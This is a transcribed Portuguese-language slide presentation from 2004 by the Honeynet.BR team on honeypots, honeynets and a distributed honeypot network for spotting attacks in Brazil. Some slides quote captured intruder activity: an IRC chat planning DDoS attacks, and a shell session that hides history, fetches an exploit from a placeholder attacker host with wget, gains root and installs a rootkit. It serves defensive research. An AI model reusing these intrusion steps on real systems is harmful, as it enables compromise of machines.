Honeypots e Honeynets: Contra-inteligência ncia no Ciberespaço

Documentos relacionados
Um Modelo Alternativo Baseado em Honeynet para Identificação e Classificação de Atacantes. Alexandre Pinaffi Andrucioli

Segurança: Tendências Atuais e Recomendações do NBSO

Microcurso: Honeypots e Honeynets

Honeypots, honeynets e honeytokens

Miriane Aparecida Batista Instituto Federal do Triângulo Mineiro Campus Paracatu Tecnólogo em Análises e Desenvolvimento de Sistemas. Cert.

IX Fórum Regional São Paulo, SP 10 de novembro de 2017

Tendências em Atividades Maliciosas na Internet Brasileira

HoneyPot e HoneyNet. Reginaldo Campos Segurança em Redes de Computadores

4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP

Apresentação, Metodologia. NBSO NIC Br Security Office

INTERNET E SEGURANÇA DOS DADOS. Introdução a Computação e Engenharia de Software. Profa. Cynthia Pinheiro

Resposta a Incidentes no Brasil: Situação Atual e o Papel do NBSO

IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017

TECNOLOGIA DA INFORMAÇÃO

PIkit : A New Kernel-Independent Processor-Interconnect Rootkit

O Que nos Mostram os Incidentes Atuais: Evolução ou Involução da Segurança nos últimos 20 anos?

Configuração do Intrusion Prevention System (IPS) para o roteador da Segurança do gigabit do Sem fio-n WRVS4400N

10 anos de rootkits. Nelson Murilo

Inicialmente as redes passaram a ser utilizadas principalmente para o compartilhamento de periféricos, principalmente discos rígidos.

RELATÓRIO ANUAL Destaques do Tratamento de Incidentes em 2010

Ataque em Sistemas Distribuídos Site :

SEGURANÇA DE SISTEMAS E REDES. TÁSSIO JOSÉ GONÇALVES GOMES

Detecção de Intrusão

Segurança da Informação

Informática. Aplicativos de Segurança. Professor Márcio Hunecke.

Projeto Honeypots Distribuídos. Antonio Montes - CenPRA/MCT Klaus Steding-Jessen NBSO/CGIbr Cristine Hoepers NBSO/CGIbr

SISTEMAS DE LOG, TRATAMENTO DE ATAQUES E ERROS PROF.: PAULO RICARDO LISBOA DE ALMEIDA

Segurança da Internet no Brasil: Estudos e Iniciativas

Sis i te t mas a O perac a i c o i nai a s um p ouco c d a a h is i tó t ria i. a... SO His i t s ó t r ó ic i o

HLBR: Um IPS invisível para a segurança em redes de computadores. João Eriberto Mota Filho (Comando do Exército Brasileiro)

Faculdade de Engenharia da Computação

FICHA DE TRABALHO #08

CERT.br, NIC.br e CGI.br Apresentação e Atuação

Sequestro em sistemas e ataques cibernéticos nas PMEs Como fazer para se prevenir. Nivaldo Cleto 30/11/2016

Serviço que permite acesso a documentos multimídia. As chamadas páginas da Web, os sites.

Introdução em Segurança de Redes

Uso de Honeypots de Baixa Interatividade na Resposta a Incidentes de Segurança

Segurança de Redes de Computadores


Fábrica de Noobs Reloaded Sistemas Operacionais Kali Linux

DESVIO DE TRÁFEGO MALICIOSO DESTINADO A REDES DE PRODUÇÃO PARA UMA HONEYNET

VSMTransactionService Documentação

1- Confiabilidade ( 2 ) Proteção contra perdas e estragos. 2- Integridade ( 3 ) Proteção contra interferência de cortes de funcionamento

Ransomware. Diretoria de Tecnologia da Informação Ifes

PROCESSADORES Unidade de Controle Unidade Aritmética e Lógica efetua memória de alta velocidade registradores Program Counter Instruction Register

Segurança da Informação. Alberto Felipe Friderichs Barros

Webinário Informática INSS Prof. Paulo França

Matéria: Sistema Computacional - SC. Prof.: Esp.: Patrícia Dias da Silva Peixoto

Fundamentos de Segurança da Internet. Cristine Hoepers, D.Sc. Klaus Steding-Jessen, D.Sc. 30/03/2016

20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP

Petter Anderson Lopes Arbitragem, Desenvolvimento Seguro, Segurança Ofensiva e Forense Computacional

Aula 11 - Enjaulamento de SO

Ransomware. Ricardo L. Ricardo Gestor de T.I

WWW = WORLD WIDE WEB

INFORMÁTICA. Com o Professor: Rene Maas

FACULDADES INTEGRADAS SANTA CRUZ DE CURITIBA MONITORAMENTO - WIRESHARK

Tratamento de Incidentes. em Função de alguns Ataques Atuais na Internet-BR

HoneyPot Web: análise do tráfego web malicioso. João Marcelo Ceron Liane Tarouco Leandro Bertholdo Leonardo Lemes Glauco Ludwig

NFAS. Node.js Full Application Server. Versão 0.1 de Alain Mouette,

IPS HLBR: aprimorando a segurança da sua rede

PROJETO INICIATIVA INTERNET SEGURA. Gilberto Zorello

Segurança e IoT: desafios e expectativas, com base nos incidentes que já estão ocorrendo. Cristine Hoepers, D.Sc. Gerente Geral CERT.br/NIC.

Segurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas

Processos e Threads e em sistemas distribuídos. Prof. Me. Hélio Esperidião

globo.com Gerenciamento de Senhas

PROGRAMA POR UMA INTERNET MAIS SEGURA. Gilberto Zorello

A Measurement Study of Attacks on BitTorrent Seeds

Questões de Concursos Aula 01 INSS INFORMÁTICA. Prof. Márcio Hunecke

Unidade III. Unidade III. Existe uma tendência dos sistemas de informação a funcionarem cada vez mais em Intranets e na Internet.

SISTEMA DE SEGURANÇA DATA: 04/05/2017. CESPE/UnB Prova Objetiva Gabarito Somente em Sala Compilação Cespe/UnB 2017 v.

Sistemas Operacionais. Prof. Andrique Amorim

FRAUDES NA INTERNET. Não seja vítima...nem vilão. VIII Encontro de Segurança em Informática 03 de outubro de 2018

Os vírus se espalham através de (MORIMOTO, 2011, p. 403):

Introdução aos Sistemas Operacionais

Ransomware. <Nome> <Instituição> < >

Redes de Computadores e Aplicações Camada de aplicação IGOR ALVES

Hardening de equipamentos

VII Fórum da Internet no Brasil Rio de Janeiro, RJ 15 de novembro de 2017

Sistemas Operacionais e Introdução à Programação. Módulo 1 Sistemas Operacionais

Simulado Aula 02 INSS INFORMÁTICA. Prof. Márcio Hunecke

Simulado Aula 01 INSS INFORMÁTICA. Prof. Márcio Hunecke

DoS, DDoS & Botnets. Alunos: Lucas Gomes, Marcos Seefelder, Vinicius Campos Professor: Otto Carlos Muniz Bandeira Duarte

Testes de Penetração: Explorador de Portas

Estruturas de Sistemas Operacionais

Tipos de Sistemas Operacionais. Professores : Jones - Wendell

Guia do Usuário do Rescue Lens

A ERA DOS CRYPTO RANSOMWARES: UM ESTUDO DE CASO SOBRE O WANNACRY. Acadêmicos: Rafael Rosário e Vanessa Lucion

Procedimentos e Ferramentas para Manutenção de Honeypots de Alta Interatividade

Guia de Segurança do Oracle Hardware Management Pack para Oracle Solaris 11.3

Sessão do único córrego do processo grande (fluxo do elefante) por serviços de FirePOWER

Plano de Aula: Programação avançada 3 - Subshell e shell restrito PROGRAMAÇÃO PARA SERVIDORES - CCT0327

Boas Práticas no Tratamento de Incidentes de Segurança

SISTEMAS OPERACIONAIS. TÁSSIO JOSÉ GONÇALVES GOMES

Grupos de Resposta a Incidentes: e o Papel do NBSO

Firewall. Prof. Marciano dos Santos Dionizio

Segurança em Computadores. <Nome> <Instituição> < >

GESTÃO DA TECNOLOGIA DA INFORMAÇÃO

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Transcrição:

Honeypots e Honeynets: Contra-inteligência ncia no Ciberespaço Time Honeynet.BR Apresentado por Dr.Antonio Montes - CenPRA/MCT

Organizaçã ção Introduçã ção Honeypots e Honeynets Honeynet.BR Resultados Rede Distribuída de Honeypots Resultados Conclusões 02/06/2004 Workshop ABIN/CPqD 2

Introduçã ção A informaçã ção é um dos bens mais preciosos das organizaçõ ções modernas. Informaçõ ções são s o armazenadas e processadas em sistemas computadorizados interconectados: Disponíveis em páginas p Web; Em sistemas de arquivos compartilhados; Copiadas do tráfego de rede; Colhidas de sistemas desprotegidos. 02/06/2004 Workshop ABIN/CPqD 3

Introduçã ção o (cont.) Crescente disponibilizaçã ção o de acesso de banda larga para usuários domésticos Crescente número n de computadores conectados à Internet sem os devidos cuidados: Permite acesso a eventuais informaçõ ções relevantes; Possibilita uso como ponto de lançamento amento de ataques contra sistemas de maior valor. 02/06/2004 Workshop ABIN/CPqD 4

Introduçã ção o (cont.) Coleta de informaçõ ções passou a ser relativamente simples => nenhum país s ou organizaçã ção o pode prescindir e, com certeza, vem sendo feito regularmente. Nesta palestra apresentamos um sistema que vem sendo implementado no País s e que pode permitir, entre outras coisas, a coleta de contra-inteligência ncia sobre atividades maliciosas que vem ocorrendo no ciberespaço o brasileiro. 02/06/2004 Workshop ABIN/CPqD 5

Introduçã ção o (cont.) Sistema composto de duas honeynets e uma rede distribuída de honeypots, esses últimos instalados em redes de produção Permite a coleta de uma grande quantidade de informações sobre o que vem ocorrendo na Internet: que vulnerabilidades vem sendo exploradas, que ferramentas de ataque estão sendo utilizadas, qual é a motivação dos atacantes, e quem desenvolveu as ferramentas e quem são os atacantes (algumas vezes). 02/06/2004 Workshop ABIN/CPqD 6

Honeypots Honeypots são recursos computacionais dedicados a serem sondados, atacados ou comprometidos, num ambiente que permita o registro e controle dessas atividades. São implementados de maneira que todo o tráfego destinado a eles seja anômalo ou malicioso, minimizando os falsopositivos. 02/06/2004 Workshop ABIN/CPqD 7

Honeypots (cont.) Honeypots podem ser classificados como: De baixa interatividade - quando os sistemas e serviços de rede são emulados, e o sistema real subjacente é inacessível; De alta interatividade - quando as máquinas atuam como servidores de serviços de rede reais e totalmente acessíveis. O atacante pode ganhar total controle sobre esses sistemas. 02/06/2004 Workshop ABIN/CPqD 8

Honeypots (cont.) Honeypots de alta interatividade são usados como ferramenta de pesquisa em redes isoladas (honeynets) de baixo valor agregado. Honeypots de baixa interatividade são de baixo risco e podem ser usados como monitores em redes de produção, de alto valor agregado. 02/06/2004 Workshop ABIN/CPqD 9

Honeynet.BR Projeto iniciado em dezembro de 2001 como um laboratório rio do curso de Segurança a de Sistemas de Informaçã ção o da pós-graduação o em Computaçã ção o Aplicada do INPE, em cooperaçã ção o com o NBSO. Entrou em operaçã ção o em março o de 2002, com o apoio da ANSP. Membro da Honeynet Alliance a partir de junho de 2002. http://www www.honeynet.org/alliance 02/06/2004 Workshop ABIN/CPqD 10

Honeynet.BR (cont.) Composta de uma sub-rede administra- tiva cuja funçã ção é registrar as atividades e conter o tráfego de saída malicioso, e de uma sub-rede de honeypots. Acesso irrestrito da Internet. 02/06/2004 Workshop ABIN/CPqD 11

Honeynet.BR (cont.) Janeiro de 2004 mais uma honeynet em operaçã ção, esta no CenPRA, com apoio da HP Brasil. Dois analistas em tempo integral. Foram registrados milhares de varreduras e ataques, dezenas de invasões, coletadas centenas de ferramentas, muitas inéditas (chkrootkit), e tráfego IRC. http://www.honeynet.org.br 02/06/2004 Workshop ABIN/CPqD 12

Bate-papo gravado no dia 06/01/2003 entre as 18:22h e 22:43h. O invasor configurou a máquina monitorada como um servidor de bate-papo com várias "salas" (x_priv8, xgroup, linuxall, hax0rs, etc) operando simultaneamente. Estão discutindo ferramentas de varredura de vulnerabilidades, ferramentas para explorar vulnerabilidades locais, combinando a invasão de várias máquinas para a realização de ataques de negação de serviços distribuídos (ddos), distribuição de nome de usuário e senha para os parceiros testarem o uso dessas máquina como anonimizadoras em ataques, e fazendo a distribuição do resultado da busca de vulnerabilidades em várias máquinas do domínio "gov.br". 02/06/2004 Workshop ABIN/CPqD 13

:Bobx!bobx@FVgGG5ohCXo.200.211.69.O PRIVMSG #x_priv8 :rvultp1xz q scan vc usa?.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :Member_X: c manja bem codar xpls em perl?.. :Bobx!bobx@FVgGG5ohCXo.200.211.69.O PRIVMSG #x_priv8 :cade os ips?.. :Member_X!~rs@7vLVjgCtOvo.200.177.162.O PRIVMSG #x_priv8 :cybersys: ainda nope... :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :bobx vamu arma um ddos forte?.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :aeiuah.. :rvultp1xz!~sddsdssdd@rvyl2x6zdhw.200.161.215.o PRIVMSG #x_priv8 :http://membres.lycos.fr/ztypedipo/screenloko.jpeg.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :Member_X: deface nemmmm.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :Member_X: temu q cata shell primero.. :rvultp1xz!~sddsdssdd@rvyl2x6zdhw.200.161.215.o PRIVMSG #x_priv8 :eh issu q a gente tah tentando fazer.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :Member_X: noi num eh defaceeeee.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :Member_X paia..skema eh entra...e faze ponte...cata uns par d shell pra faze um ddos loko.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :rvultp1xz: nda ainda?.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :vo ve se eu deskolo0 aki cuns camarada meu.. 02/06/2004 Workshop ABIN/CPqD 14

:cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :http://membres. lycos.fr.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :http://membres. lycos.fr.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :derrubei.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :ahahaha.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :q bosta.. :rvultp1xz!~sddsdssdd@rvyl2x6zdhw.200.161.215.o PRIVMSG #x_priv8 :ahahahaha.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :derrubei uai.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :ehehe.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :DoS.. :rvultp1xz!~sddsdssdd@rvyl2x6zdhw.200.161.215.o PRIVMSG #x_priv8 :tah dando bad requqest.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 : to aprendenu DoS e DDoS.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :rvultp1xz: c precisa d target pra q msm?.. :rvultp1xz!~sddsdssdd@rvyl2x6zdhw.200.161.215.o PRIVMSG #x_priv8: ahuahuahuahuhau tu.. :cybersys!cyber@wfwt57bodma.200.161.142.o PRIVMSG #x_priv8 :rvultp1xz: eu derrubei msm http://membres.lycos.fr??.. 02/06/2004 Workshop ABIN/CPqD 15

Dificuldades: Honeynet.BR (cont.) uso de criptografia impedia o acompanhamento de algumas atividades. Foi desenvolvida uma ferramenta (SMART) que permite o registro e a visualizaçã ção o em tempo real das atividades em honeypots rodando Linux; honeynets de baixa visibilidade => nenhuma chance de ataque dirigido, somente ataques oportunistas. 02/06/2004 Workshop ABIN/CPqD 16

TERM=xterm; export TERM=xterm; exec bash -i bash: no job control in this shell bash-2.05b$ unset HISTFILE; uname -a; id; w; Linux nome-honeypot.localdomain 2.4.7-10 #1 \ Thu Sep 6 17:21:28 EDT 2001 i586 unknown uid=48(apache) gid=48(apache) groups=48(apache) 3:11pm up 1 day, 23:53,0 users,load average:0.04, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bash-2.05b$ cd /var/tmp bash-2.05b$ wget sitio.do.atacante/rh73.tgz --15:12:21-- http://sitio.do.atacante/rh73.tgz => `rh73.tgz' Connecting to sitio.do.atacante:80... connected! HTTP request sent, awaiting response... 200 OK Length: 3,992 [text/plain] 0K.. 100% @ 14.77 KB/s bash-2.05b$ tar zxf rh73.tgz bash-2.05b$./rh73 [+] Attached to 3685[+] Waiting for signal [+] Signal caught [+] Shellcode placed at 0x40010ced [+] Now wait for suid shell... # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),\ 3(sys),4(adm),6(disk),10(wheel) # mkdir /var/local/cdb 02/06/2004 Workshop ABIN/CPqD 17 # cd /var/local/cdb

# wget sitio.do.atacante/nutoy.tgz --15:13:04-- http://sitio.do.atacante/nutoy.tgz=>`nutoy.tgz' Connecting to sitio.do.atacante:80... connected! HTTP request sent, awaiting response... 200 OK Length: 181,134 [text/plain] 0K......... 28% @ 7.72 KB/s 50K......... 56% @ 4.38 KB/s 100K......... 84% @ 6.30 KB/s 150K...... 100% @ 6.56 KB/s 15:13:34 (5.91 KB/s) - `nutoy.tgz' saved [181134/181134] # tar zxf nutoy.tgz # cd nutoy #./install Fuckt'up by nutoy For u mothafuckar Let`s start to instal our Beauty This install is ONLY for root so... +++ We can go on!... -> A saida foi reduzida devido a quantidade de linhas # ps ax grep cons 3731? R 0:00./cons.saver -p 1711 3760? S 0:00 grep cons 02/06/2004 Workshop ABIN/CPqD 18

Rede Distribuída de Honeypots Tem o objetivo de aumentar a capacidade de detecçã ção o de incidentes, de correlaçã ção de eventos, de determinaçã ção o de tendência ncia de ataques no ciberespaço o brasileiro, etc. Para isso está sendo montada uma rede distribuída da de honeypots de baixa interatividade, buscando cobrir partes relevantes do espaço o de endereçamento da Internet no Brasil. 02/06/2004 Workshop ABIN/CPqD 19

02/06/2004 Workshop ABIN/CPqD 20

RDH (cont.) Várias outras instituiçõ ções em fase de implementaçã ção. Os honeypots são s o implementados por meio dos aplicativos de domínio públicop honeyd e arpd. Emulam vários v sistemas operacionais oferecendo diferentes serviços de rede, e respondem por blocos de endereços de rede inseridos em redes de produçã ção o de alto valor. 02/06/2004 Workshop ABIN/CPqD 21

RDH (cont.) Uma grande vantagem deste arranjo é a segurança, a, visto que esses honeypots virtuais não n o possuem as vulnerabilidades que estão o sendo exploradas e o sistema subjacente é inacessível, permitindo acesso apenas para máquinas m de administraçã ção. Por outro lado, como em todo honeypot, apenas tráfego dirigido a eles é coletado. 02/06/2004 Workshop ABIN/CPqD 22

RDH (cont.) Além m disso, esses sistemas coletam bem menos material do que os honeypots de alta interatividade, visto que suas funcio- nalidades são s o limitadas pelo projeto dos emuladores e não n o permitem sessões interativas. Apesar disso, eles respondem a varredu- ras como os sistemas reais e conseguem enganar grande parte dos ataques auto- matizados (worms). 02/06/2004 Workshop ABIN/CPqD 23

RDH (cont.) Dessa maneira, foram colhidas centenas de variantes de worms como Kuang, Kuang2, MyDoom, etc. Essas variantes são s o coletadas por rotinas automáticas ticas e enviadas para grupos de antivirus e usadas no desenvolvi- mento de vacinas (NBSO). Um outro uso dessa Rede é a coleta do ruído de fundo da Internet, isto é,, o tráfego associado a worms, varreduras e ataques automatizados, erros de endereçamento, etc. 02/06/2004 Workshop ABIN/CPqD 24

RDH (cont.) Isso é particularmente importante na coleta de contra-inteligência ncia (cyberint), visto que em muitas situaçõ ções é difícil separar os ataques reais, dirigidos, do restante do tráfego mali- cioso que circula na Internet. Os dados coletados permitem também m a correlaçã ção o dos ataques e suas origens, associados a diferentes parâmetros da rede sob ataque (tipo de rede, missão o da institui- ção, etc). 02/06/2004 Workshop ABIN/CPqD 25

Acessos por País s de Origem 02/06/2004 Workshop ABIN/CPqD 26

Acesso por País s de Origem 02/06/2004 Workshop ABIN/CPqD 27

Variaçã ção o no Tempo 02/06/2004 Workshop ABIN/CPqD 28

Variaçã ção o no Tempo 02/06/2004 Workshop ABIN/CPqD 29

Conclusões Riqueza de dados Mudança a de paradigma Sem falsos positivos Permite estudar os atacantes em seu próprio prio ambiente Desenvolvimento de um sistema de alarme (early( warning) FUD (Fear( Fear, Uncertainty,, and Doubt) 02/06/2004 Workshop ABIN/CPqD 30

Time Honeynet.BR CenPRA/MCT Antonio Montes Lucio H. Franco L. Gustavo Barbato INPE/MCT Amândio Balcão Fo. Benício Carvalho Carlos H.P. Chaves NBSO/CGI.br Cristine Hoepers Klaus Steding-Jessen Marcelo H.P. Chaves 02/06/2004 Workshop ABIN/CPqD 31

2024 © DocPlayer.com.br Política de Privacidade | Termos de serviço | Feedback